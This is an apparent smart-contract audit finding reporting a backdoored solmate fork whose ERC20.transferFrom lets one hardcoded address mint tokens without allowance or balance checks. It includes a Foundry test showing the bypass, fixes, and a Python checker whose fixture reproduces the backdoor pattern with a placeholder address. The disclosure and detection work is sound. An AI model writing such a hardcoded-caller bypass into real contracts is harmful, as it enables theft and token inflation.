Submission Details
Severity: high
Valid

Malicious contract library (solmate-bad) allows a malicious actor to mint the entire supply of SANTA tokens through ERC20's transferFrom function

Summary

Malicious contract library (solmate-bad) allows a malicious actor to mint the entire supply of SANTA tokens through ERC20's transferFrom function

Vulnerability Details

The protocol's Makefile installs solmate-bad from a location (patrickalphac/solmate-bad) controlled by a malicious actor rather than from the upstream solmate repository. Inside the library's ERC20.sol, the transferFrom() function contains a branch that lets one specific calling address move SANTA tokens to itself or to any other address without checking an allowance and without deducting the amount from the victim's ("from" address) balance. The effect is that tokens are minted to the "to" address out of thin air. Because the victim's balance is never reduced, the call can be repeated any number of times, so the whole supply can be created this way.

Impact

High

PoC

  1. In the Foundry test file, add two users - thief and patsy.

  2. In an existing test, add `console.log("thief: ", thief);`, run that test with -vv, and note the address printed for thief.

  3. Remove the console.log line from your test.

  4. In the malicious ERC20.sol, change the address hardcoded in transferFrom from 0x815F577F1c1bcE213c012f166744937C889DAF17 to the address of thief.

Now run the following Foundry test. It fails, because the transferFrom call that vm.expectRevert expects to revert succeeds instead:

    // thief and patsy are the two test addresses added in the steps above.
    function testTryToSteal() public {
        // Give patsy a SANTA balance; thief holds nothing and has no allowance from patsy.
        deal(address(santaToken), patsy, 10e18);
        // The next call is made as thief, the address hardcoded in the backdoored transferFrom.
        vm.prank(thief);
        // A correct ERC20 must revert here (no allowance); the backdoor lets the call go through.
        vm.expectRevert();
        santaToken.transferFrom(patsy, thief, 10e18);
    }

Tools Used

Visual Studio Code, Foundry

Recommendations

  1. Remove the malicious solmate-bad library from the /libs folder

  2. Install the correct solmate library: forge install transmissions11/solmate --no-commit

  3. Modify the Makefile to install solmate from the correct location

  4. Modify the foundry.toml file with correct mapping for @solmate

  5. Rebuild the solution

  6. Re-run the test above; it should now pass, because transferFrom reverts for a caller with no allowance
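The finding has two parts that a defender can check mechanically: the dependency was pulled from a fork rather than the trusted upstream (Vulnerability Details and recommendations 1-4), and the fork's transferFrom carries a hardcoded address that bypasses the allowance and balance logic. The script below is an added example, not part of this submission or of the CodeHawks project, and it is not taken from the solmate-bad repository. It parses a Foundry project's .gitmodules, compares submodule remotes against a trusted-upstream table (TRUSTED_REMOTES is an assumption for the example), and scans the body of ERC20.transferFrom for 20-byte address literals, which have no business in a generic token transfer. The .gitmodules and Solidity fixtures are constructed inline; the "good" transferFrom follows upstream solmate's logic, and the "bad" one is a stand-in for the pattern the finding describes, with a placeholder address.

```python
"""Audit a Foundry project's solmate dependency for the two issues in the finding:
a submodule fetched from an untrusted remote, and a hardcoded address literal inside
ERC20.transferFrom. All fixtures below are constructed for this example."""
import re

# Trusted upstream per library name (assumption for this example).
TRUSTED_REMOTES = {"solmate": "https://github.com/transmissions11/solmate"}

# Any 20-byte hex literal, the shape of a hardcoded EVM address.
ADDRESS_RE = re.compile(r"\b0x[0-9a-fA-F]{40}\b")

# Constructed .gitmodules fixtures: one pointing at a fork, one at upstream.
GITMODULES_BAD = """
[submodule "lib/solmate-bad"]
\tpath = lib/solmate-bad
\turl = https://github.com/patrickalphac/solmate-bad
"""
GITMODULES_GOOD = """
[submodule "lib/solmate"]
\tpath = lib/solmate
\turl = https://github.com/transmissions11/solmate
"""

# Constructed transferFrom bodies. The good one mirrors upstream solmate's logic;
# the bad one is a stand-in for the backdoor pattern, with a placeholder address.
ERC20_GOOD = """
function transferFrom(address from, address to, uint256 amount) public virtual returns (bool) {
    uint256 allowed = allowance[from][msg.sender];
    if (allowed != type(uint256).max) allowance[from][msg.sender] = allowed - amount;
    balanceOf[from] -= amount;
    unchecked { balanceOf[to] += amount; }
    emit Transfer(from, to, amount);
    return true;
}
"""
ERC20_BAD = """
function transferFrom(address from, address to, uint256 amount) public virtual returns (bool) {
    if (msg.sender == 0x0000000000000000000000000000000000000BAD) {
        unchecked { balanceOf[to] += amount; }
        return true;
    }
    uint256 allowed = allowance[from][msg.sender];
    if (allowed != type(uint256).max) allowance[from][msg.sender] = allowed - amount;
    balanceOf[from] -= amount;
    unchecked { balanceOf[to] += amount; }
    return true;
}
"""


def parse_gitmodules(text: str) -> dict:
    """Return {submodule path: remote url} from the contents of a .gitmodules file."""
    modules, path, url = {}, None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[submodule"):
            if path and url:
                modules[path] = url
            path = url = None
        elif line.startswith("path ="):
            path = line.split("=", 1)[1].strip()
        elif line.startswith("url ="):
            url = line.split("=", 1)[1].strip()
    if path and url:
        modules[path] = url
    return modules


def check_remotes(modules: dict, trusted: dict) -> list:
    """Flag a submodule whose path names a trusted library but whose remote is not the trusted one."""
    findings = []
    for path, url in modules.items():
        for lib, good_url in trusted.items():
            if lib in path.lower() and url.rstrip("/").lower() != good_url.lower():
                findings.append(f"{path}: remote {url} is not the trusted {good_url}")
    return findings


def function_body(source: str, name: str) -> str:
    """Return the brace-delimited body of `function name(...)`, or "" if absent."""
    start = source.find(f"function {name}(")
    if start < 0:
        return ""
    brace = source.find("{", start)
    depth = 0
    for i in range(brace, len(source)):
        if source[i] == "{":
            depth += 1
        elif source[i] == "}":
            depth -= 1
            if depth == 0:
                return source[brace:i + 1]
    return source[brace:]


def hardcoded_addresses(source: str, fn: str = "transferFrom") -> list:
    """Address literals that appear inside the given function; a clean ERC20 has none."""
    return sorted(set(ADDRESS_RE.findall(function_body(source, fn))))


def audit(gitmodules: str, erc20_source: str) -> list:
    """Combine both checks into a list of findings; an empty list means the dependency looks clean."""
    findings = check_remotes(parse_gitmodules(gitmodules), TRUSTED_REMOTES)
    for addr in hardcoded_addresses(erc20_source):
        findings.append(f"ERC20.transferFrom contains hardcoded address {addr}")
    return findings


if __name__ == "__main__":
    for label, gm, src in (("fork", GITMODULES_BAD, ERC20_BAD), ("upstream", GITMODULES_GOOD, ERC20_GOOD)):
        print(label, audit(gm, src) or "clean")
```

In a real repository the two fixture strings would be read from `.gitmodules` and `lib/<dep>/src/tokens/ERC20.sol`; the remote check is what recommendations 1 and 3 amount to, and the literal scan catches the kind of edit the finding describes even if the fork is later renamed to look like upstream. Pinning the submodule to a known upstream commit hash is the complement to this check, since a matching URL alone does not prove the checked-out tree is unmodified.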

Updates

Lead Judging Commences

inallhonesty Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

unauthorized elf wallet approval in solmate-bad

Some sneaky elf has changed this library to a corrupted one where his wallet address skips all the approval checks for SantaToken! Shenanigans here - https://github.com/PatrickAlphaC/solmate-bad/blob/c3877e5571461c61293503f45fc00959fff4ebba/src/tokens/ERC20.sol#L88
